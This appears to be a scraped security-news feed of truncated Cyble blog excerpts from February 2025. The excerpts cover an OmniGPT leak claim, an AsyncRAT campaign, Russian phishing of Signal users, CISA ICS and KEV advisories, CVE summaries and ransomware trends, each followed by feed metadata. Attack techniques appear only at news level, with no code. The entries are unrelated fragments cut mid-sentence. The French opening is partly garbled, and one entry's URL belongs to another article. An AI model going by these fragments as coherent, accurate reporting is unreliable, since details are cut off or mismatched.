omnigpt hacker affirme Omnigpt intègre plusieurs modèles de grande langue (LLM) bien connus dans une seule plate-forme, notamment Google Gemini, Chatgpt, Claude Sonnet, Perplexity, Deepseek et Dall-E, ce qui en fait une plate-forme pratique pour accéder à une gamme d'outils LLM.  le Acteurs de menace (TAS), qui a posté sous les alias qui comprenait des effets de synthéticotions plus sombres et, a affirmé que les données "contient tous les messages entre les utilisateurs et le chatbot de ce site ainsi que tous les liens vers les fichiers téléchargés par les utilisateurs et également les e-mails utilisateur de 30 000. Vous pouvez trouver de nombreuses informations utiles dans les messages tels que les clés API et les informations d'identification et bon nombre des fich]]> 2025-02-21T13:59:15+00:00 https://cyble.com/blog/omnigpt-leak-risk-ai-data/ www.secnews.physaphae.fr/article.php?IdArticle=8649585 False Spam,Tool,Vulnerability,Threat ChatGPT 3.0000000000000000 Cyble - CyberSecurity Firm Key Takeaways Cyble Research and Intelligence Labs (CRIL) identified a campaign that utilizes malicious LNK files disguised as wallpapers to trick users into executing them. The malware uses a multi-stage execution process, using obfuscated PowerShell scripts to fetch additional payloads from the remote server.    The Threat Actor (TA) behind this campaign leverages the open-source tool Null-AMSI to bypass the malware Scan Interface (AMSI) and Event Tracing for Windows (ETW). The PowerShell script used to bypass AMSI and ETW contains comments and error messages in Portuguese, suggesting that the TA may be a Portuguese-speaking individual or group. The malware employs AES encryption and GZIP compression to conceal its payloads, making it harder for security tools to analyze and detect malicious components. The final payload is executed into memory using reflection loading, bypassing traditional security measures while ensuring persistence and executing AsyncRAT for remote control. Overview Cyble Research and Intelligence Labs (CRIL) identified a campaign likely orchestrated by a Portuguese-speaking TA, as evidenced by the comments and error messages present in one of the malicious scripts. While the initial infection vector remains unknown, the campaign distributes malware through a deceptive shortcut file. Specifically, the campaign uses a malicious LNK file disguised as a wallpaper featuring popular animated characters, indicating that the TA is exploiting users\' interests to increase the likelihood of infection. When executed, the shortcut file initiates a series of mali]]> 2025-02-21T05:30:52+00:00 https://cyble.com/blog/null-amsi-evading-security-to-deploy-asyncrat/ www.secnews.physaphae.fr/article.php?IdArticle=8649470 False Spam,Malware,Tool,Vulnerability,Threat,Patching None 3.0000000000000000 Cyble - CyberSecurity Firm Overview  Google Threat Intelligence Group (GTIG) has identified multiple Russia-aligned threat actors actively targeting Signal Messenger accounts as part of a multi-year cyber espionage operation. The campaign, likely driven by Russia\'s intelligence-gathering objectives during its invasion of Ukraine, aims to compromise the secure communications of military personnel, politicians, journalists, and activists.  The tactics observed in this campaign include phishing attacks abusing Signal\'s linked devices feature, malicious JavaScript payloads and malware designed to steal Signal messages from compromised Android and Windows devices. While the focus remains on Ukrainian targets, the threat is expected to expand globally as adversaries refine their techniques.  Google has partnered with Signal to introduce security enhancements that mitigate these attack vectors, urging users to update to the latest versions of the app.  Tactics Used to Compromise Signal Accounts  Exploiting Signal\'s "Linked Devices" Feature  Russia-aligned threat actors have manipulated Signal\'s legitimate linked devices functionality to gain persistent access to victim accounts. By tricking users into scanning malicious QR codes, attackers can link an actor-controlled device to the victim\'s account, enabling real-time message interception without full device compromise.  The phishing methods used to deliver these malicious QR codes include:  Fake Signal group invites containing altered JavaScript redirects.  Phishing pages masquerading as Ukrainian military applications.  ]]> 2025-02-20T13:21:16+00:00 https://cyble.com/blog/germany-strengthening-cybersecurity-2/ www.secnews.physaphae.fr/article.php?IdArticle=8649243 True Malware,Tool,Vulnerability,Threat,Mobile,Cloud,Conference APT 44 2.0000000000000000 Cyble - CyberSecurity Firm Overview Cyble\'s weekly industrial control system (ICS) vulnerability report to clients examined 122 ICS, operational technology (OT), and Supervisory Control and Data Acquisition (SCADA) vulnerabilities pulled from 22 recent advisories from the U.S. Cybersecurity and Infrastructure Security Agency (CISA). The 122 vulnerabilities affect products from seven vendors across nine critical sectors, ranging from energy and healthcare to wastewater systems, transportation, manufacturing, food and agriculture, chemicals, and commercial facilities. Nine of the vulnerabilities are rated critical. One interesting aspect of the advisories is how many of the ICS vulnerabilities come from third-party components that weren\'t made by the ICS vendor, revealing the complexity and vulnerability of these critical systems. Four Critical Siemens Vulnerabilities Siemens had the highest number of vulnerabilities in the CISA advisories, 100 in all, but only four were rated critical-and all of the critical vulnerabilities came from non-Siemens components. Two of the critical vulnerabilities affect Siemens Opcenter Intelligence, a manufacturing intelligence platform used to improve manufacturing processes and stem from vulnerabilities in the Java OpenWire protocol marshaller (CVE-2023-46604, a 9.6-severity Deserialization of Untrusted Data vulnerability) and the Tableau Server Administration Agent\'s internal file transfer service (CVE-2022-22128, a 9.0-rated Path Traversal vulnerability). Opcenter Intelligence versions prior to V2501 are affected. CISA addressed those vulnerabilities in a February 13 advisory, noting that “Successful exploitation of these vulnerabilities could enable an attacker to execute remote code or allow a malicious site administrator to]]> 2025-02-20T10:10:49+00:00 https://cyble.com/blog/cisa-vulnerability-complexity-of-ics-products/ www.secnews.physaphae.fr/article.php?IdArticle=8649191 True Tool,Vulnerability,Patching,Industrial,Medical,Commercial None 3.0000000000000000 Cyble - CyberSecurity Firm Overview   The Cybersecurity and Infrastructure Security Agency (CISA) has announced updates to its Industrial Control Systems (ICS) advisories, along with the addition of two new vulnerabilities to its Known Exploited Vulnerabilities (KEV) Catalog. On February 18, 2025, CISA published two updated advisories detailing critical vulnerabilities found in industrial control systems. These advisories are vital for system administrators and users working with ICS to address security concerns and take necessary actions to mitigate the associated risks.  ICSA-24-191-01: Delta Electronics CNCSoft-G2 (Update A)  Delta Electronics\' CNCSoft-G2, a human-machine interface (HMI) software, has been found to have multiple vulnerabilities that could be exploited by remote attackers. These vulnerabilities, which include buffer overflows and out-of-bounds writes, can lead to remote code execution. The specific versions affected include CNCSoft-G2 Version 2.0.0.5, as well as older versions like 2.1.0.10 and 2.1.0.16.  The vulnerabilities are as follows:  Stack-based Buffer Overflow (CVE-2024-39880)  Out-of-bounds Write (CVE-2024-39881)  Out-of-bounds Read (CVE-2024-39882)  Heap-based Buffer Overflow (CVE-2024-39883, CVE-2025-22880, CVE-2024-12858)  ]]> 2025-02-19T12:18:54+00:00 https://cyble.com/blog/cisa-upgrades-known-exploited-vulnerabilities-catalog/ www.secnews.physaphae.fr/article.php?IdArticle=8648991 False Tool,Vulnerability,Threat,Industrial None 2.0000000000000000 Cyble - CyberSecurity Firm Overview  Cyberattacks in 2025 are not just frequent-they are becoming more technically advanced, making it critical for organizations to be proactive in their approach to security. In the modern cybersecurity landscape, focusing on when, not if, an incident will occur is essential. By developing a strong security framework through sound design and strategic planning, Australian businesses can reduce risks and mitigate the damage caused by cyberattacks.  A cornerstone of this proactive approach is the concept of Modern Defensible Architecture (MDA), which provides organizations with a strategic framework for applying security principles consistently in the design, development, and maintenance of systems. The Australian government introduces MDA, with guidance from the Australian Signals Directorate (ASD) and the Australian Cyber Security Centre (ACSC). Together, these entities help define Foundations for Modern Defensible Architecture that help organizations build secure and resilient systems, preparing them to defend against cyber threats.  Understanding Modern Defensible Architecture  The key to creating a Modern Defensible Architecture is the ability to defend against cyber threats while maintaining adaptability for future challenges. The ASD, through the ACSC, has developed a set of guidelines known as the ]]> 2025-02-19T10:39:07+00:00 https://cyble.com/blog/australia-introduces-modern-defensible-architecture/ www.secnews.physaphae.fr/article.php?IdArticle=8648974 False Vulnerability,Threat,Patching,Cloud None 2.0000000000000000 Cyble - CyberSecurity Firm Overview The Indian Computer Emergency Response Team (CERT-In) has issued a critical security advisory (CIVN-2025-0025) detailing multiple vulnerabilities across various Adobe products. These security flaws pose significant risks, including unauthorized code execution, privilege escalation, security bypass, and denial-of-service (DoS) attacks. Users and administrators of affected Adobe software are urged to apply security updates immediately to mitigate these risks. Affected Software The vulnerabilities impact multiple Adobe products across different versions. The affected software includes: Adobe InDesign InDesign 1D20.0 and earlier versions InDesign 1D19.5.1 and earlier versions Adobe Commerce Adobe Commerce 2.4.4-p11 and earlier versions Adobe Commerce B2B 1.3.3-p11 and earlier versions Magento Open Source 2.4.4-p11 and earlier versions Adobe Substance 3D Stager Substance 3D Stager 3.1.0 and earlier versions Adobe InCopy InCopy 20.0 and earlier versions ]]> 2025-02-18T14:09:54+00:00 https://cyble.com/blog/cert-in-issues-critical-software-security-flaws/ www.secnews.physaphae.fr/article.php?IdArticle=8648875 False Vulnerability,Threat None 3.0000000000000000 Cyble - CyberSecurity Firm Overview A critical security vulnerability has been identified in PHP, one of the most widely used server-side scripting languages for web development. The vulnerability, tracked as CVE-2022-31631, affects multiple versions of PHP and poses a significant risk to websites and applications relying on the PHP Data Objects (PDO) extension for SQLite database interactions. The flaw, which stems from an integer overflow issue in the PDO::quote() function, has the potential to allow SQL injection attacks, leading to unauthorized access, data breaches, and system compromise. Key Details CVE ID: CVE-2022-31631 CVSS Base Score: 9.1 (Critical) Affected Component: PDO::quote() function when used with SQLite databases Impact: SQL injection vulnerability due to improper string sanitization Published Date: February 12, 2025 Last Modified: February 13, 2025 Source: PHP Group Severity Level: Critical Affected PHP Versions The vulnerability affects the following versions of PHP: ]]> 2025-02-18T13:09:49+00:00 https://cyble.com/blog/cve-2022-31631-vulnerability-immediate-patch/ www.secnews.physaphae.fr/article.php?IdArticle=8648866 False Vulnerability None 3.0000000000000000 Cyble - CyberSecurity Firm Cloud-based platforms and AI-driven services continue to remain in the crosshairs of rapidly evolving malware. Recently, Microsoft released a security advisory addressing two critical vulnerabilities affecting Azure AI Face Service (CVE-2025-21415) and Microsoft Account (CVE-2025-21396). These flaws could allow attackers to escalate privileges under specific conditions, leading to unauthorized access and system compromise. Given the increasing reliance on AI and cloud technologies, understanding these vulnerabilities and their implications is crucial for organizations and security professionals. Overview of the Vulnerabilities Microsoft identified and patched two security vulnerabilities that could have led to privilege escalation: 1. CVE-2025-21396 (Microsoft Account Elevation of Privilege Vulnerability) Severity Score: 7.5 (CVSS) Cause: Missing authorization checks in Microsoft Accounts. Risk: An unauthorized attacker could exploit this flaw to elevate privileges over a network. Discovery: Reported by security researcher Sugobet. 2. CVE-2025-21415 (Azure AI Face Service Elevation of Privilege Vulnerability) Severity Score: 9.9 (CVSS) ]]> 2025-02-17T14:35:56+00:00 https://cyble.com/blog/cve-2025-21415-microsoft-critical-security-risks/ www.secnews.physaphae.fr/article.php?IdArticle=8648770 False Malware,Tool,Vulnerability,Threat,Cloud None 3.0000000000000000 Cyble - CyberSecurity Firm Overview Cyble\'s vulnerability intelligence report to clients last week highlighted flaws in Ivanti, Apple, Fortinet, and SonicWall products. The report from Cyble Research and Intelligence Labs (CRIL) examined 22 vulnerabilities and dark web exploits, including some with significant internet-facing exposures. Microsoft had a relatively quiet Patch Tuesday, with the most noteworthy fixes being for two actively exploited zero-day vulnerabilities (CVE-2025-21391, a Windows Storage Elevation of Privilege Vulnerability, and CVE-2025-21418, a Windows Ancillary Function Driver for WinSock Elevation of Privilege Vulnerability), but other IT vendors also issued updates on the second Tuesday of the month. Both Microsoft vulnerabilities were added to CISA\'s Known Exploited Vulnerabilities catalog. Cyble\'s vulnerability intelligence unit highlighted five new vulnerabilities as meriting high-priority attention by security teams, plus a month-old vulnerability at elevated risk of attack. The Top IT Vulnerabilities Three of the vulnerabilities highlighted by Cyble (CVE-2025-22467, CVE-2024-38657, and CVE-2024-10644) affect Ivanti Connect Secure (ICS), a secure ]]> 2025-02-17T11:56:58+00:00 https://cyble.com/blog/it-vulnerability-ivanti-apple-fixes-urged-by-cyble/ www.secnews.physaphae.fr/article.php?IdArticle=8648746 False Vulnerability,Threat,Patching,Industrial None 3.0000000000000000 Cyble - CyberSecurity Firm BSI Expands Cybersecurity Cooperation with Hamburg  Germany continues to strengthen its cybersecurity framework as the Federal Office for Information Security (BSI) and the Free and Hanseatic City of Hamburg formalize their collaboration. The agreement, signed on February 7, at Hamburg City Hall, establishes a structured approach to cyber threat intelligence sharing, incident response coordination, and awareness initiatives for public sector employees.  BSI Vice President Dr. Gerhard Schabhüser called for the urgency of strengthening cybersecurity across federal and state levels:  “In view of the worrying threat situation in cyberspace, Germany must become a cyber nation. State administrations and municipal institutions face cyberattacks daily. Attacks on critical infrastructure threaten social order. Germany is a target of cyber sabotage and espionage. Our goal is to enhance cybersecurity nationwide. To achieve this, we must collaborate at both federal and state levels.”  This partnership is part of a broader federal initiative, with BSI having previously signed cooperation agreements with Saxony, Saxony-Anhalt, Lower Saxony, Hesse, Bremen, Rhineland-Palatinate, and Saarland. These agreements provide a constitutional framework for joint cyber defense efforts, strategic advisory services, and rapid response measures following cyber incidents.  With cyber threats growing in complexity, state-level cooperation plays a vital role in reinforcing Germany\'s cybersecurity resilience, ensuring government agencies, public sector institutions, and critical infrastructure operators have the necessary tools and expertise to prevent, detect, and mitigate cyber threats effectively.  Addressing Digital Violence  Days later, on February 11, BSI hosted “BSI in Dialogue: Cybersecurity and Digital Violence” in Berlin, bringing together representatives from politics, industry, academia, and civil society to address the growing risks associated with digital violence in an increasingly interconnected world.  While cybercriminals typically operate remotely, digital violence introduces a new layer of cyber threats, where attackers exploit personal relationships, home technologies, and social connections to manipulate, monitor, or harm individuals. This includes:  Unauthorized access to smart home device]]> 2025-02-14T12:07:49+00:00 https://cyble.com/blog/germany-strengthening-cybersecurity/ www.secnews.physaphae.fr/article.php?IdArticle=8648472 False Tool,Vulnerability,Threat,Technical None 3.0000000000000000 Cyble - CyberSecurity Firm In a strongly worded advisory, the FBI and the U.S. Cybersecurity and Infrastructure Security Agency (CISA) have urged software developers to cease unsafe development practices that lead to “unforgivable” buffer overflow vulnerabilities.  “Despite the existence of well-documented, effective mitigations for buffer overflow vulnerabilities, many manufacturers continue to use unsafe software development practices that allow these vulnerabilities to persist,” the agencies said in the February 12 Secure By Design alert. “For these reasons-as well as the damage exploitation of these defects can cause-CISA, FBI, and others designate buffer overflow vulnerabilities as unforgivable defects.”  The agencies said threat actors leverage buffer overflow vulnerabilities to gain initial access to networks, thus making them a critical point for preventing attacks.  We\'ll look at the prevalence of buffer overflow vulnerabilities, some examples cited by CISA and the FBI, and guidance for secure development and use of memory-safe programming languages.  Buffer Overflow Vulnerabilities: Prevalence and Examples  The FBI-CISA guidance specifically mentions the common software weaknesses CWE-119 (Improper Restriction of Operations within the Bounds of a Memory Buffer), along with stack-based buffer overflows (CWE-121) and heap-based buffer overflows (CWE-122).  The phrase “buffer overflow” occurs in 67 of the 1270 vulnerabilities in CISA\'s Known Exploited Vulnerabilities (KEV) catalog, or 5.28% of the KEV database. The words “buffer” and “overflow” occur in 84 of the KEV vulnerabilities (6.6%).  CISA and the FBI cited six examples of buffer overflow vulnerabilities in IT products:  CVE-2025-21333, a Windows Hyper-V NT Kernel Integration VSP Elevation of Privilege vulnerability  CVE-2025-0282, a stack-based buffer overflow in Ivanti Connect Secure before version 22.7R2.5, Ivanti Policy Secure before version 22.7R1.2, and Ivanti Neurons for ZTA gateways before version 22.7R2.3  ]]> 2025-02-14T10:11:29+00:00 https://cyble.com/blog/fbi-cisa-push-for-memory-safe-software-practices/ www.secnews.physaphae.fr/article.php?IdArticle=8648463 False Vulnerability,Threat None 4.0000000000000000 Cyble - CyberSecurity Firm In a recent update to its Known Exploited Vulnerabilities Catalog, the Cybersecurity and Infrastructure Security Agency (CISA) has added four security vulnerabilities that are currently under active exploitation. These vulnerabilities span across multiple platforms and pose substantial security risks for both organizations and individual users. The vulnerabilities identified in CVE-2024-40891, CVE-2024-40890, CVE-2025-21418, and CVE-2025-21391 can be exploited with relative ease if security updates are not applied promptly. Users and organizations should follow the guidance provided by vendors like Zyxel and Microsoft, ensuring that their systems are updated regularly to address the latest security flaws. For organizations relying on Zyxel DSL routers or Windows-based systems, it is crucial to assess the exposure to these vulnerabilities and take immediate steps to update firmware or software versions. Details of the Vulnerabilities and Active Exploitation CVE-2024-40891 and CVE-2024-40890: Critical Command Injection Vulnerabilities in Zyxel DSL Routers The two vulnerabilities-CVE-2024-40891 and CVE-2024-40890-are related to a series of Command Injection Vulnerabilities affecting Zyxel DSL CPE devices. Specifically, these vulnerabilities affect the Zyxel VMG4325-B10A router model running firmware version 1.00(AAFR.4)C0_20170615. Both vulnerabilities share a common thread: they allow authenticated attackers to execute arbitrary operating system (OS) commands on the affected devices via Telnet (CVE-2024-40891) or a crafted HTTP POST request (CVE-2024-40890). This puts devices at high risk of being compromised by threat actors who can exploit these weaknesses to gain control of the affected systems. According to the official Zyxel advisory, both vulnerabilities have been assigned a CVSS severity score of 8.8 (High). These flaws stem from improper neutralization of special elements used in OS commands (CWE-78: Improper Neutralization of Special Elements used in an OS Command). Once successfully exploited, the vulnerabilities could allow attackers to bypass authentication and execute malicious OS commands, effectively compromising the security of the devices. Zyxel has issued advisories urging users to update their firmware to mitigate these vulnerabilities. Devices using older firmware versions are especially at risk. The active exploitation of these vulnerabilities could lead to severe consequences, such as unauthorized access, ]]> 2025-02-13T11:40:21+00:00 https://cyble.com/blog/cisa-adds-4-critical-vulnerabilities/ www.secnews.physaphae.fr/article.php?IdArticle=8648344 False Vulnerability,Threat None 3.0000000000000000 Cyble - CyberSecurity Firm Overview Cyble\'s weekly industrial control system (ICS) vulnerability report to clients warned about internet-facing medical imaging and critical infrastructure asset management systems that could be vulnerable to cyberattacks. The report examined six ICS, operational technology (OT), and Supervisory Control and Data Acquisition (SCADA) vulnerabilities in total, but it focused on two in particular after Cyble detected web-exposed instances of the systems. Orthanc, Trimble Cityworks Vulnerabilities Highlighted by CISA The U.S. Cybersecurity and Infrastructure Security Agency (CISA) issued advisories alerting users to vulnerabilities in medical imaging and asset management products. Orthanc is an open-source DICOM server used in healthcare environments for medical imaging storage and retrieval, while Trimble Cityworks is a GIS-centric asset management system used to manage all infrastructure assets for airports, utilities, municipalities, and counties. In a February 6 ICS medical advisory, CISA said the Orthanc server prior to version 1.5.8 does not enable basic authentication by default when remote access is enabled, which could result in unauthorized access by a malicious actor. The Missing Authentication for Critical Function vulnerability, CVE-2025-0896, has been assigned a CVSS v3.1 base score of 9.8, just below the maximum score of 10.0. Orthanc recommends that users update to the latest version or enable HTTP authentication by setting the configuration "AuthenticationEnabled": true in the configuration file. Cyble provided a publicly accessible search query for its ODIN vulnerability search tool, which users can use to find potentially vulnerable instances. “This flaw requires urgent attention, as Cyble researchers have identified multiple internet-facing Orthanc instances, increasing the risk of exploitation,” the Cyble report said. “The exposure of vulnerable instances could allow unauthorized access to sensitive medical data, manipulation of imaging records, or even unauthorized control over the server. Given the high stakes in healthcare cybersecurity, immediate patching to version 1.5.8 or later, along with restricting external access, is strongly recommended to mitigate potential threats.]]> 2025-02-13T11:15:54+00:00 https://cyble.com/blog/cyble-warns-of-exposed-medical-imaging-systems/ www.secnews.physaphae.fr/article.php?IdArticle=8648345 True Tool,Vulnerability,Threat,Patching,Industrial,Medical None 3.0000000000000000 Cyble - CyberSecurity Firm Overview The 2023/24 Cyber Threat Report from New Zealand\'s National Cyber Security Centre (NCSC), led by Lisa Fong, Deputy Director-General for Cyber Security at the Government Communications Security Bureau (GCSB), sheds light on the country\'s rapidly changing cyber threat landscape. The report highlights an increase in cyber incidents targeting individuals, businesses, and critical national sectors, underlining the growing complexity of cyber threats. For the year ending June 2024, the NCSC recorded a whopping total of 7,122 cybersecurity incidents, marking a new milestone since CERT NZ\'s integration into the NCSC. Of these incidents, 95% (6,799) were handled through the NCSC\'s general triage process. These incidents primarily affected small to medium businesses and individual users and resulted in a reported financial loss of $21.6 million. While these incidents did not require specialized technical interventions, they still had a substantial impact on those affected, particularly in terms of financial losses and reputational damage. A smaller subset of incidents, 343 in total, was categorized as having national significance. These incidents were more complex and targeted critical infrastructure or large organizations. Among them, 110 were linked to state-sponsored actors, signaling a slight increase in cyber activities from such groups. Financially motivated cybercriminal activities were responsible for 65 of these high-impact incidents, emphasizing the persistent threat from financially driven attacks such as ransomware and data exfiltration. 2023/24 Cyber Threat Report: State-Sponsored Cyber Threats and Ransomware ]]> 2025-02-12T10:33:38+00:00 https://cyble.com/blog/ncsc-reports-surge-in-cyber-threats-and-vulnerabilities/ www.secnews.physaphae.fr/article.php?IdArticle=8648178 False Ransomware,Tool,Vulnerability,Threat,Technical None 3.0000000000000000 Cyble - CyberSecurity Firm Overview The Cyber Security Agency of Singapore (CSA) has recently issued a warning regarding the active exploitation of a zero-day vulnerability (CVE-2025-24200) in a range of Apple products. This critical vulnerability is being actively targeted, and Apple has released timely security updates to address the issue. If exploited, the vulnerability could allow attackers to bypass certain security features and gain unauthorized access to sensitive data through USB connections. The vulnerability, identified as CVE-2025-24200, affects various Apple devices, including iPhones and iPads. Specifically, the issue lies in the USB Restricted Mode, a security feature designed to prevent unauthorized access to a device\'s data when it is locked. A successful attack could disable this mode, allowing an unauthenticated attacker to access the device\'s data via a USB connection, even if the device is locked. This flaw has been dubbed a "zero-day vulnerability," as it was discovered and actively exploited before a patch or security fix was made available. Apple has moved quickly to resolve the issue with new security updates released on February 10, 2025. Affected Apple Products ]]> 2025-02-11T12:46:32+00:00 https://cyble.com/blog/csa-alerts-users-of-cve-2025-24200/ www.secnews.physaphae.fr/article.php?IdArticle=8648036 False Vulnerability,Threat,Mobile None 4.0000000000000000 Cyble - CyberSecurity Firm Cyble\'s weekly industrial control system (ICS) vulnerability report to clients included a warning about a severe vulnerability in a patient monitor that could potentially compromise patient safety. In all, the report covered 36 ICS, operational technology (OT) and Supervisory Control and Data Acquisition (SCADA) vulnerabilities, 31 of which affect critical manufacturing and energy systems. Ten of the 36 vulnerabilities were rated “critical” and 17 carried high-risk ratings. Patient Monitor Vulnerability Carries a 9.8 Risk Rating The patient monitor vulnerability, CVE-2024-12248, was one of three flaws in Contec Health CMS8000 Patient Monitors that were addressed in a January 30 advisory from the U.S. Cybersecurity and Infrastructure Security Agency (CISA). CISA said the vulnerabilities were reported to the agency anonymously. The Food and Drug Administration (FDA) also issued an alert about the vulnerabilities the same day. The FDA said the flaws “may put patients at risk after being connected to the internet,” but added that the agency “is not aware of any cybersecurity incidents, injuries, or deaths related to these cybersecurity vulnerabilities at this time.” The FDA advisory contained recommendations for patients and caregivers for mitigating the risk that included the following advice: “If your health c]]> 2025-02-10T13:34:05+00:00 https://cyble.com/blog/cyble-warns-risk-in-ics-vulnerability-report/ www.secnews.physaphae.fr/article.php?IdArticle=8647860 False Tool,Vulnerability,Patching,Industrial,Medical None 2.0000000000000000 Cyble - CyberSecurity Firm Overview Veeam has issued a security update to address a critical vulnerability (CVE-2025-23114) affecting its Veeam Updater component. This flaw allows attackers to execute arbitrary code remotely by leveraging a Man-in-the-Middle (MitM) attack. The vulnerability has a CVSS v3.1 score of 9.0, indicating a severe security risk. Users and administrators of affected products should update their software immediately to mitigate potential threats. Technical Details The vulnerability exists due to improper Transport Layer Security (TLS) certificate validation in the Veeam Updater component. Attackers can intercept and modify communication between the Veeam Backup server and update sources, enabling them to execute arbitrary code with root privileges. Given the high severity of this flaw, exploitation could lead to complete system compromise, data loss, or ransomware attacks. Affected Products The following Veeam Backup products contain the vulnerable Veeam Updater component: Current Releases: Veeam Backup for Salesforce - Version 3.1 and older Previous Releases: Veeam Ba]]> 2025-02-10T10:12:05+00:00 https://cyble.com/blog/cve-2025-23114-veeam-users-urged-to-patch-now/ www.secnews.physaphae.fr/article.php?IdArticle=8647827 False Ransomware,Tool,Vulnerability,Patching None 3.0000000000000000 Cyble - CyberSecurity Firm The current digital landscape necessitates an approach to sharing content on social media for significant user engagement and click-through rates. This is where the Open Graph Protocol (OGP) comes into play. Developed by Facebook, Open Graph allows web developers to control how their web pages appear when shared across various platforms. Developers use specific meta tags in a webpage\'s HTML to define essential elements such as the title, description, and image that accompany shared links. Attackers have long exploited the Open Graph Protocol for malicious activities. Recently, Cyble Research and Intelligence Labs (CRIL) also observed a threat actor on a Russian underground offering a toolkit dubbed \'OG Spoof\' for similar operations. The toolkit was designed for phishing campaigns, aiming to mislead users and artificially inflate click-through rates by exploiting flaws in the Open Graph protocol. Overview The importance of Open Graph (OG) tags cannot be overstated. The OG tags enhance the visibility of content, making it appealing to a broader base of potential viewers and more likely to garner views and clicks. Figure 1: OG tags used in the header Several content management systems (CMS), such as WordPress and Magento, come equipped with built-in functionalities or plugins that automatically generate these tags based on the post\'s content. This automation ensures that when links are shared, they are presented in an engaging manner while accurately previewing their content. The TA released the \'OG Spoof\' kit for sale in October 2024 at a staggering USD 2,500 price and claimed that it was initially designed for their own fraudulent operations. However, as they developed advanced methods, the toolk]]> 2025-02-07T12:57:51+00:00 https://cyble.com/blog/open-graph-spoofing-toolkit/ www.secnews.physaphae.fr/article.php?IdArticle=8647415 False Malware,Vulnerability,Threat None 3.0000000000000000 Cyble - CyberSecurity Firm Overview Cyble Research & Intelligence Labs (CRIL) published their Weekly Vulnerability Insights Report to clients, covering key vulnerabilities reported from January 29 to February 4, 2025. The analysis highlights critical security flaws that have posed cyber threats to various IT infrastructures globally. Notably, the Cybersecurity and Infrastructure Security Agency (CISA) added five vulnerabilities to the Known Exploited Vulnerability (KEV) catalog. This report highlights vulnerabilities in several widely used software products and services, including Paessler PRTG Network Monitor, Microsoft .NET Framework, and Zyxel DSL devices. These vulnerabilities could impact a range of industries that rely on these systems to monitor, manage, and protect critical infrastructure. Incorporation of Vulnerabilities into the KEV Catalog CISA\'s inclusion of vulnerabilities in the KEV catalog is an important step in highlighting serious risks associated with widely deployed software. During this period, CISA added five vulnerabilities, including two dating back to 2018, that have been actively exploited and affect major IT infrastructure tools like Paessler PRTG Network Monitor. These vulnerabilities were assessed for their active exploitation and listed accordingly to ensure better protection for organizations globally. Among the newly added vulnerabilities, CVE-2018-19410 and ]]> 2025-02-07T11:44:32+00:00 https://cyble.com/blog/cybles-weekly-vulnerability-kev-catalog/ www.secnews.physaphae.fr/article.php?IdArticle=8647402 False Tool,Vulnerability,Threat,Patching,Mobile None 3.0000000000000000 Cyble - CyberSecurity Firm Overview According to an analysis of Cyble threat intelligence data, U.S. ransomware attacks have surged to the start of 2025, up nearly 150% from the first five weeks of 2024. Ransomware attacks on U.S. targets have been climbing since a few organizations paid ransoms to attackers in highly publicized cases last year, making the country a more attractive target for ransomware groups. That\'s likely the main reason for the increase. Regardless of the timeframe or changes in the most active ransomware groups, U.S. ransomware attacks have increased substantially in the last year and have been climbing steadily since the fall. We\'ll examine the changing ransomware landscape in the U.S. and other frequently attacked countries and consider what changes may be in store as we approach 2025. The Effect of Ransomware Payments In the first five weeks of 2024, Cyble documented 152 ransomware attacks on U.S. targets, in line with late 2023 trends. In the first five weeks of 2025, that number soared to 378 attacks on U.S. targets, a 149% year-over-year increase. Compared to the end of 2024, attacks are up a still significant 29% so far in 2025, up from 282 in the last five weeks of the year. Perhaps owing to geographical proximity, Canada has also seen a significant increase in ransomware attacks, up from 14 in the year-ago period to 28 at the end of 2024, and nearly doubling again to 46 to start 2025. Even as North American ransomware attacks have soared, the next-most attacked regions have stayed relatively stable. France, for example, had 18 attacks to start in 2024 and has seen 19 thus far in 2025 (chart below). ]]> 2025-02-07T10:55:33+00:00 https://cyble.com/blog/u-s-ransomware-attacks-surge-to-start-2025/ www.secnews.physaphae.fr/article.php?IdArticle=8647393 False Ransomware,Tool,Vulnerability,Threat,Legislation,Prediction,Medical None 3.0000000000000000 Cyble - CyberSecurity Firm Overview The Cybersecurity and Infrastructure Security Agency (CISA) released a series of nine Industrial Control Systems (ICS) advisories on February 4, 2025. These CISA ICS advisories provide essential information about vulnerabilities, security risks, and recommended mitigations affecting various industrial control systems and their components. The advisories, which highlight numerous threats across a variety of devices, emphasize the need for vigilance and prompt action to protect critical infrastructure from potential exploits. The nine advisories address flaws found in systems from notable vendors such as Schneider Electric, Rockwell Automation, and AutomationDirect. These vulnerabilities can allow attackers to disrupt operations, gain unauthorized access, or even execute remote code on compromised devices. Details of the Industrial Control Systems Advisories 1. Western Telematic Inc. Vulnerability Advisory Code: ICSA-25-035-01 Vulnerable Products: NPS Seri]]> 2025-02-06T11:44:16+00:00 https://cyble.com/blog/cisa-new-industrial-control-systems-advisories/ www.secnews.physaphae.fr/article.php?IdArticle=8647196 False Vulnerability,Threat,Legislation,Industrial None 3.0000000000000000 Cyble - CyberSecurity Firm Overview The rise in cyber threats targeting edge devices has prompted the cybersecurity agencies of the UK, Australia, Canada, New Zealand, and the United States to release new guidelines aimed at strengthening the security of these critical network components. These recommendations urge manufacturers to integrate robust forensic and logging features by default, making it easier to detect and investigate cyber intrusions. As cybercriminals and state-sponsored actors continue to exploit vulnerabilities in edge devices, organizations must adopt these security measures to mitigate risks. “In the face of a relentless wave of intrusions involving network devices globally our new guidance sets what we collectively see as the standard required to meet the contemporary threat,” said NCSC Technical Director Ollie Whitehouse. “In doing so we are giving manufacturers and their customers the tools to ensure products not only defend against cyberattacks but also provide investigative capabilities require post intrusion.” Understanding Edge Device Security Risks Edge devices, including routers, IoT sensors, security cameras, and smart appliances, act as critical gateways between local networks and the internet. These devices are often deployed with minimal security features, making them attractive targets for attackers who exploit vulnerabilities to gain unauthorized access, disrupt services, or maintai]]> 2025-02-06T10:44:52+00:00 https://cyble.com/blog/new-security-guidelines-edge-device-manufacturers/ www.secnews.physaphae.fr/article.php?IdArticle=8647186 False Tool,Vulnerability,Threat,Technical None 3.0000000000000000 Cyble - CyberSecurity Firm Overview  The Cybersecurity and Infrastructure Security Agency (CISA) has recently added four vulnerabilities to its Known Exploited Vulnerabilities Catalog. These vulnerabilities, identified in widely-used software products, have been actively exploited by cyber attackers.   With these updates, CISA highlights the importance of addressing these flaws promptly to mitigate the risks they pose, particularly to federal enterprises and other critical infrastructure sectors. The newly added vulnerabilities include CVE-2024-45195, CVE-2024-29059, CVE-2018-9276, and CVE-2018-19410, all of which could have severe consequences for the security of affected systems.  Detailed List of Vulnerabilities Highlighed in the Known Exploited Vulnerabilities Catalog  CVE-2024-45195: Apache OFBiz Forced Browsing Vulnerability  The first of the vulnerabilities, CVE-2024-45195, relates to a 